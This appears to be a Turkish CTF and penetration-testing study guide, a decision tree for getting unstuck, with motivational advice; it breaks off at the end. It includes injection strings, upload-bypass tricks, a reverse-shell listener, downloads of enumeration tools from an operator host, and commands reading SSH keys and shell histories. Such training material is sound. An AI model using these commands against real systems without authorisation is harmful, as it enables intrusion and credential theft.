🐺 VALTRYON

📚 9 Kategori 📄 18 Dosya

🆘 ROADMAP: Takıldığımda Ne Yapmalıyım?

CTF ve penetration test sırasında takıldığınızda kullanabileceğiniz kapsamlı problem çözme rehberi

roadmap troubleshooting help stuck problem-solving debugging ctf-help enumeration-help privesc-help motivation

🆘 ROADMAP: Takıldığımda Ne Yapmalıyım?

"Her engel, yeni bir şey öğrenme fırsatıdır."

📋 İçindekiler


🎯 Giriş

CTF ve penetrasyon testinde takılmak normaldir. Bu rehber, takıldığınızda:

  • Nereden devam edeceğinizi
  • Hangi kaynaklara başvuracağınızı
  • Nasıl problemi çözeceğinizi

gösterir.

⚠️ Önemli Prensip

TEXT
❌ YANLIŞ: "5 dakika denedim, writeup okumalıyım"
✅ DOĞRU: "En az 30-60 dakika daha farklı yaklaşımlar denemeliyim"

HATIRLA: En çok öğrenme, takıldığın ve çözmeye çalıştığın anlardadır!

🗺️ Ana Karar Ağacı

TEXT
CTF/Machine çözemiyorum, takıldım
            │
            ├─► Ne kadar süre uğraştım?
            │            │
            │            ├─► 5-10 dakika ──► ❌ Çok erken! En az 30 dk daha dene
            │            ├─► 30-60 dakika ──► ✅ Hangi aşamada takıldın?
            │            └─► 2+ saat ────► ✅ Yardım alabilitsin
            │
            ▼
    Hangi aşamada takıldım?
            │
            ├─► 1️⃣ ENUMERATION (Keşif)
            │   └─► "Port taraması yaptım ama bir şey bulamıyorum"
            │   └─► "Web sayfası var ama gizli dizin bulamıyorum"
            │   └─► "Hiçbir exploit çalışmıyor"
            │
            ├─► 2️⃣ INITIAL ACCESS (İlk Giriş)
            │   └─► "Zafiyeti buldum ama exploit edemedim"
            │   └─► "Shell alamıyorum"
            │   └─► "Credential brute force çalışmıyor"
            │
            ├─► 3️⃣ PRIVILEGE ESCALATION (Yetki Yükseltme)
            │   └─► "Shell aldım ama root olamıyorum"
            │   └─► "LinPEAS çalıştırdım ama bir şey bulamadım"
            │   └─► "Bir şey buldum ama exploit etmeyi bilmiyorum"
            │
            └─► 4️⃣ POST-EXPLOITATION
                └─► "Root oldum ama flag bulamıyorum"
                └─► "Lateral movement yapamıyorum"

🔍 Hangi Aşamada Takıldım?

1️⃣ ENUMERATION (Keşif Aşaması)

TEXT
Sorun: "Port taraması yaptım ama bir şey bulamıyorum"
            │
            ├─► Tüm portları taradın mı?
            │            │
            │           No ──► FIX:
            │            │      nmap -p- -sV -sC -A <IP> --min-rate=1000
            │            │      • -p- : Tüm portlar (1-65535)
            │            │      • --min-rate=1000 : Hızlı tarama
            │            │      • Süre: 5-10 dakika daha bekle
            │            │
            │           Yes
            │            │
            ├─► UDP taraması yaptın mı?
            │            │
            │           No ──► FIX:
            │            │      sudo nmap -sU --top-ports 100 <IP>
            │            │      • SNMP (161), TFTP (69) gibi UDP servisleri
            │            │
            │           Yes
            │            │
            ├─► Servis versiyonlarını not aldın mı?
            │            │
            │           No ──► FIX:
            │            │      • Her servis için version bilgisini Google'da ara
            │            │      • searchsploit <service> <version>
            │            │      • Google: "<service> <version> exploit"
            │            │
            │           Yes
            │            │
            └─► Hala bulamadım
                        │
                        └─► Checklist:
                            □ Banner grabbing yaptım mı? (nc <IP> <port>)
                            □ Nmap script taraması yaptım mı? (--script=vuln)
                            □ Özel port kombinasyonları var mı?
                            □ Firewall/filtering var mı?

                            ➡️ Kaynak: 📖 guides/02_recon_enumeration/

TEXT
Sorun: "Web sayfası var ama gizli dizin bulamıyorum"
            │
            ├─► Hangi wordlist kullandın?
            │            │
            │            ├─► common.txt ──► ⚠️ Çok küçük!
            │            │                    FIX: Daha büyük wordlist dene
            │            │                    • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
            │            │                    • SecLists: Discovery/Web-Content/
            │            │
            │            └─► directory-list-2.3 ──► ✅ İyi, devam et
            │                         │
            │                         ├─► Farklı extensionlar denedin mi?
            │                         │            │
            │                         │           No ──► FIX:
            │                         │            │      gobuster dir -u http://<IP> -w wordlist.txt -x php,html,txt,pdf,zip,bak
            │                         │            │      • Web teknolojisine göre: .asp, .aspx, .jsp
            │                         │            │
            │                         │           Yes
            │                         │            │
            │                         ├─► Farklı tool denedin mi?
            │                         │            │
            │                         │           No ──► FIX:
            │                         │            │      • Gobuster sonuç vermezse → ffuf dene
            │                         │            │      • ffuf -u http://<IP>/FUZZ -w wordlist.txt
            │                         │            │      • dirsearch veya feroxbuster dene
            │                         │            │
            │                         │           Yes
            │                         │            │
            │                         └─► Subdomain enumeration yaptın mı?
            │                                      │
            │                                     No ──► FIX:
            │                                      │      ffuf -u http://FUZZ.<domain> -w subdomains.txt -H "Host: FUZZ.<domain>"
            │                                      │      • Sadece IP varsa gerek yok
            │                                      │
            │                                     Yes
            │                                      │
            │                                      └─► Kaynak kontrolleri:
            │                                           □ robots.txt kontrol ettim mi?
            │                                           □ sitemap.xml var mı?
            │                                           □ Kaynak kodu inceledim mi? (Ctrl+U)
            │                                           □ JavaScript dosyalarını inceledim mi?
            │                                           □ Cookies/Headers ilginç bir şey var mı?
            │                                           
                                                        ➡️ Kaynak: 📖 guides/02_recon_enumeration/web_enumeration/

2️⃣ INITIAL ACCESS (İlk Giriş Aşaması)

TEXT
Sorun: "Zafiyeti buldum ama exploit edemedim"
            │
            ├─► Exploit türü nedir?
            │            │
            │            ├─► SQL Injection
            │            │            │
            │            │            ├─► Manuel denedim mi?
            │            │            │   └─► ' OR 1=1--
            │            │            │   └─► admin' --
            │            │            │   └─► FIX: 📄 cheatsheets/phase_1/sql_injection_cheatsheet.md
            │            │            │
            │            │            ├─► SQLMap kullandım mı?
            │            │            │   └─► sqlmap -u "http://<IP>/page.php?id=1" --batch --dump
            │            │            │   └─► FIX: 📖 guides/03_web_exploitation/web_exploitation.md
            │            │            │
            │            │            └─► Hala çalışmıyor?
            │            │                └─► WAF bypass dene
            │            │                └─► 📄 cheatsheets/phase_8/waf_bypass_cheatsheet.md
            │            │
            │            ├─► Command Injection
            │            │            │
            │            │            └─► Farklı payload'lar denedin mi?
            │            │                └─► ; ls
            │            │                └─► | ls
            │            │                └─► `ls`
            │            │                └─► $(ls)
            │            │                └─► FIX: 📄 cheatsheets/phase_2/command_injection_cheatsheet.md
            │            │
            │            ├─► File Upload
            │            │            │
            │            │            └─► Bypass teknikleri denedin mi?
            │            │                └─► .php → .php5, .phtml, .phar
            │            │                └─► Magic bytes değiştir
            │            │                └─► Double extension: .php.jpg
            │            │                └─► FIX: 📄 cheatsheets/phase_1/file_upload_bypass_cheatsheet.md
            │            │
            │            └─► Public Exploit
            │                         │
            │                         └─► Exploit çalışmıyor?
            │                             ├─► Doğru versiyonu kullanıyor muyum?
            │                             ├─► Exploit kodunu okudum mu?
            │                             ├─► Gerekli parametreleri verdim mi?
            │                             ├─► Python version uyumlu mu? (Python2 vs Python3)
            │                             └─► FIX: Exploit kodunu debug et, print ekle

TEXT
Sorun: "Shell alamıyorum"
            │
            ├─► Listener açık mı?
            │            │
            │           No ──► FIX: nc -lvnp 4444
            │            │
            │           Yes
            │            │
            ├─► Firewall engelliyor olabilir mi?
            │            │
            │           Maybe ──► FIX: Farklı portlar dene
            │            │           • 443, 53, 80 gibi yaygın portlar
            │            │           • nc -lvnp 443
            │            │
            │           No
            │            │
            ├─► Farklı reverse shell payload'ları denedin mi?
            │            │
            │           No ──► FIX:
            │            │      📄 cheatsheets/phase_1/reverse_shells_cheatsheet.md
            │            │      • Bash reverse shell
            │            │      • Python reverse shell
            │            │      • PHP reverse shell
            │            │      • Netcat reverse shell
            │            │      • PowerShell reverse shell (Windows)
            │            │
            │           Yes
            │            │
            ├─► IP adresini doğru mu girdin?
            │            │
            │            └─► Kontrol: ip a veya ifconfig
            │                • VPN IP'ni kullan (tun0)
            │                • Makine IP'ni değil!
            │
            └─► Hala çalışmıyor?
                        │
                        └─► Alternatifler:
                            • Bind shell dene
                            • Web shell yükle ve komut çalıştır
                            • SSH key injection (varsa)

                            ➡️ Kaynak: 📖 guides/04_exploitation_payloads/shells_guide.md

3️⃣ PRIVILEGE ESCALATION (Yetki Yükseltme)

TEXT
Sorun: "Shell aldım ama root olamıyorum"
            │
            ├─► Hangi sistem?
            │            │
            │            ├─► Linux
            │            │            │
            │            │            ├─► LinPEAS çalıştırdım mı?
            │            │            │            │
            │            │            │           No ──► FIX:
            │            │            │            │      wget http://<YOUR_IP>/linpeas.sh
            │            │            │            │      chmod +x linpeas.sh
            │            │            │            │      ./linpeas.sh | tee linpeas_output.txt
            │            │            │            │      • Kırmızı/sarı output'lara odaklan
            │            │            │            │
            │            │            │           Yes
            │            │            │            │
            │            │            ├─► Manuel enumeration yaptım mı?
            │            │            │            │
            │            │            │           No ──► FIX:
            │            │            │            │      sudo -l                    # Sudo rights
            │            │            │            │      find / -perm -4000 2>/dev/null  # SUID
            │            │            │            │      cat /etc/crontab          # Cron jobs
            │            │            │            │      cat /etc/passwd           # Users
            │            │            │            │      ps aux                    # Processes
            │            │            │            │      netstat -ano              # Network
            │            │            │            │
            │            │            │           Yes
            │            │            │            │
            │            │            └─► Bulduklarımı exploit etmeyi biliyor muyum?
            │            │                         │
            │            │                         ├─► SUID buldum
            │            │                         │   └─► GTFOBins: https://gtfobins.github.io/
            │            │                         │   └─► Arama: SUID binary name
            │            │                         │   └─► 📄 cheatsheets/phase_3/Living_lolbins_gtfobins_cheatsheet.md
            │            │                         │
            │            │                         ├─► Sudo rights buldum
            │            │                         │   └─► sudo -l output'unu GTFOBins'de ara
            │            │                         │   └─► FIX: 📖 guides/05_privilege_escalation/linux_privesc_kapsamli.md
            │            │                         │
            │            │                         ├─► Cron job buldum
            │            │                         │   └─► Writable mi? (ls -la /path/to/script)
            │            │                         │   └─► PATH injection yapabilir miyim?
            │            │                         │   └─► FIX: 📖 writeups/ornek_senaryolar/ornek4_cronjob.md
            │            │                         │
            │            │                         └─► Kernel exploit
            │            │                             └─► uname -a
            │            │                             └─► searchsploit kernel <version>
            │            │                             └─► 📄 cheatsheets/phase_3/kernel_exploits_cheatsheet.md
            │            │
            │            └─► Windows
            │                         │
            │                         ├─► WinPEAS çalıştırdım mı?
            │                         │            │
            │                         │           No ──► FIX:
            │                         │            │      certutil -urlcache -f http://<YOUR_IP>/winPEASx64.exe winpeas.exe
            │                         │            │      .\winpeas.exe
            │                         │            │
            │                         │           Yes
            │                         │            │
            │                         ├─► Manuel enumeration yaptım mı?
            │                         │            │
            │                         │           No ──► FIX:
            │                         │            │      whoami /all                # Privileges
            │                         │            │      net user                   # Users
            │                         │            │      net localgroup administrators  # Admins
            │                         │            │      sc query                   # Services
            │                         │            │      reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"  # AutoLogon
            │                         │            │
            │                         │           Yes
            │                         │            │
            │                         └─► Bulduklarımı exploit etmeyi biliyor muyum?
            │                                      │
            │                                      ├─► Service exploit
            │                                      │   └─► Unquoted service path
            │                                      │   └─► Weak service permissions
            │                                      │   └─► FIX: 📖 guides/05_privilege_escalation/windows_privesc.md
            │                                      │
            │                                      ├─► Token manipulation
            │                                      │   └─► SeImpersonatePrivilege var mı?
            │                                      │   └─► PrintSpoofer / JuicyPotato
            │                                      │   └─► FIX: 📄 cheatsheets/phase_3/windows_privesc_cheatsheet.md
            │                                      │
            │                                      └─► Registry exploits
            │                                          └─► AlwaysInstallElevated
            │                                          └─► Weak registry permissions
            │
            └─► Detaylı rehber:
                📖 guides/05_privilege_escalation/
                📖 guides/01_strateji_metodoloji/karar_agaci_ileri.md

TEXT
Sorun: "LinPEAS çalıştırdım ama bir şey bulamadım"
            │
            └─► DURUM DEĞERLENDĠRMESĠ:
                        │
                        ├─► 1. Output'u kaydettin mi?
                        │   └─► ./linpeas.sh | tee output.txt
                        │   └─► Offline oku, detaylı incele
                        │
                        ├─► 2. Kırmızı/Sarı çıktılara baktın mı?
                        │   └─► LinPEAS renk kodlaması kullanır
                        │   └─► Kırmızı = Yüksek öncelik
                        │   └─► Sarı = Orta öncelik
                        │
                        ├─► 3. Manuel enumeration yaptın mı?
                        │   └─► LinPEAS her şeyi bulamayabilir
                        │   └─► sudo -l
                        │   └─► getcap -r / 2>/dev/null
                        │   └─► find / -writable 2>/dev/null
                        │
                        ├─► 4. Kullanıcı dosyalarını inceledin mi?
                        │   └─► cat /home/*/.bash_history
                        │   └─► cat /home/*/.ssh/id_rsa
                        │   └─► find /home -name "*.txt" -o -name "*.conf"
                        │
                        └─► 5. Web root inceledin mi?
                            └─► /var/www/html
                            └─► Config dosyaları (db credentials)
                            └─► Backup dosyaları

4️⃣ POST-EXPLOITATION

TEXT
Sorun: "Root oldum ama flag bulamıyorum"
            │
            ├─► Doğru yerde arıyor muyum?
            │            │
            │            └─► Standart lokasyonlar:
            │                • /root/root.txt
            │                • /root/flag.txt
            │                • /home/<user>/user.txt
            │                • C:\Users\Administrator\Desktop\root.txt
            │                • C:\Users\<user>\Desktop\user.txt
            │
            ├─► Find komutu kullandım mı?
            │            │
            │           No ──► FIX:
            │            │      find / -name "*flag*" 2>/dev/null
            │            │      find / -name "*root.txt*" 2>/dev/null
            │            │      find / -name "user.txt" 2>/dev/null
            │            │
            │           Yes
            │            │
            ├─► Gizli dosya olabilir mi?
            │            │
            │            └─► FIX:
            │                ls -la /root
            │                ls -la /home/<user>
            │                • Gizli dosyalar . ile başlar
            │
            └─► Hala bulamadım?
                        │
                        └─► İpuçları:
                            • HTB: /root/root.txt ve /home/<user>/user.txt
                            • THM: Oda açıklamasında belirtilir
                            • Base64 encoded olabilir
                            • Steganography olabilir

🆘 Yardım Alma Stratejileri

1. Self-Help (İlk 30-60 Dakika)

TEXT
Adım 1: Derin nefes al, sakinleş
        • Frustrasyon normaldir
        • Mola ver (5-10 dakika)

Adım 2: Şimdiye kadar ne yaptığını not al
        • Hangi komutları çalıştırdım?
        • Hangi sonuçları aldım?
        • Ne denedim, ne çalışmadı?

Adım 3: Farklı yaklaşım dene
        • Farklı wordlist
        • Farklı tool
        • Farklı payload
        • Farklı port

Adım 4: İlgili cheatsheet'i oku
        📄 cheatsheets/ klasöründeki ilgili dosya
        • Kaçırdığın bir teknik olabilir

Adım 5: Örnek senaryolara bak
        📖 writeups/ornek_senaryolar/
        • Benzer bir senaryo var mı?

2. Hafif İpucu (60-90 Dakika Sonra)

TEXT
Forum'dan hafif ipucu al (writeup OKUMA!):

HTB:
• Forum > Machines > <Machine Name>
• "Nudge" butonuna tıkla
• Spoiler olmayan ipuçları oku

TryHackMe:
• Room'da "Hint" butonu varsa kullan
• Discord #help kanalı

Genel:
• Reddit: r/hackthebox, r/tryhackme
• Discord: Official sunucular
• SADECE: "Hangi yöne bakmalıyım?" tarzı genel ipuçları

3. Writeup (2+ Saat Sonra)

TEXT
Eğer 2+ saat uğraştıysan ve ilerleyemediysen:

Adım 1: Writeup bul
        • HTB: Makine retired olmalı
        • THM: Oda tamamlanabilir
        • YouTube: IppSec, 0xdf, John Hammond

Adım 2: SADECE takıldığın adımı oku
        • Tüm writeup'ı okuma!
        • Sadece "Initial Access" veya "PrivEsc" bölümü
        • İpucunu al, devam et

Adım 3: Çözümü kendinde tekrarla
        • Writeup'taki komutu kopyala-yapıştırma
        • Kendin yaz ve anla
        • Not al

Adım 4: Benzer bir makine daha çöz
        • Aynı tekniği pekiştir
        • Farklı bir makinede uygula

4. Topluluk Yardımı

TEXT
Discord/Forum'da soru sor:

✅ İYİ SORU:
"HTB Lame makinesinde enumeration yaptım. Nmap çıktısı:
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1
139/tcp open  netbios-ssn Samba smbd 3.X
445/tcp open  netbios-ssn Samba smbd 3.X

SMB'de anonymous login denedim ama erişim yok. FTP'de de aynı durum.
Hangi yöne bakmalıyım?"

❌ KÖTÜ SORU:
"Lame makinesini çözemedim, exploit linki atar mısınız?"
"PrivEsc nasıl yapılır?"

İyi soru özellikleri:
• Şimdiye kadar ne yaptığını göster
• Spesifik ol
• Sonuçları paylaş
• Direkt çözüm isteme, yön iste

💪 Motivasyon ve Zihinsel Durum

Takılmak Normaldir!

TEXT
Gerçek:
• Profesyonel pentester'lar bile takılır
• Her CTF bir öğrenme deneyimidir
• Zorlanmak = Büyümek

"Kolay makineler bize bir şey öğretmez,
 zor olanlar öğretir."

Burnout (Tükenmişlik) Önleme

TEXT
Belirtiler:
□ Artık eğlenmiyorum
□ Her şey çok zor geliyor
□ Motivasyonum kalmadı
□ Açtığım her makine sıkıyor

Çözüm:
1. MOLA VER
   • 1-2 gün hiç CTF yapma
   • Başka hobilerle ilgilen

2. Kolaydan başla
   • Çok zor makineden kolay machine'e geç
   • Özgüven kazanmak için kolay bir tane çöz

3. Farklı alan dene
   • Web'den sıkıldıysan AD dene
   • CTF'den sıkıldıysan forensics yap

4. Toplulukla etkileşim
   • Discord'da sohbet et
   • Writeup oku (çözmeden)
   • Başkalarına yardım et

5. Hedef değiştir
   • "10 makine çözmeliyim" yerine
   • "1 yeni teknik öğrenmeliyim"

Growth Mindset

TEXT
Fixed Mindset (Sabit Zihniyet):
❌ "Ben buna yetenekli değilim"
❌ "Bu çok zor, yapamam"
❌ "Başkaları daha iyi"

Growth Mindset (Gelişim Zihniyeti):
✅ "Henüz bilmiyorum, ama öğreneceğim"
✅ "Zor, ama çalışırsam yapabilirim"
✅ "Başkaları nasıl yaptı, ben de öğrenebilirim"

Hatırla:
• Herkes bir noktada başladı
• Senin gördüğün "uzman"lar da bir zamanlar yeni başlamıştı
• Consistent (tutarlı) çalışma > Yetenek

✅ Özet: Ne Zaman Ne Yapmalı?

TEXT
0-30 dakika:
└─► Kendi başına dene, farklı yaklaşımlar

30-60 dakika:
└─► Cheatsheet oku, örnek senaryolara bak

60-90 dakika:
└─► Forum'dan hafif ipucu al (spoiler-free)

90-120 dakika:
└─► Mola ver, başka bir şey yap, tekrar dön

2+ saat:
└─► Writeup'ın ilgili bölümünü oku
└─► Öğren, not al, benzer makine çöz

Tükendim:
└─► 1-2 gün mola ver
└─► Kolay makine çöz
└─► Farklı alan dene
└─► Toplulukla etkileşim

🎯 Son Hatırlatmalar

TEXT
✅ Takılmak öğrenmenin bir parçasıdır
✅ Sabırlı ol, her şey zamanla gelir
✅ Hata yapmak normaldir
✅ Topluluktan yardım istemekten çekinme
✅ Her çözüm seni daha iyi yapar
✅ Mola vermek, pes etmek değildir

Pes etme, devam et! 🚀


📞 Yardım Kaynakları

Topluluklar

TEXT
Discord:
• TryHackMe Official
• HackTheBox Official
• Cybersecurity & Hacking (unofficial)

Reddit:
• r/hackthebox
• r/tryhackme
• r/netsec
• r/AskNetsec

Forum:
• HTB Forums
• HTB Discord #help

YouTube Kanalları

TEXT

• IppSec (HTB Writeups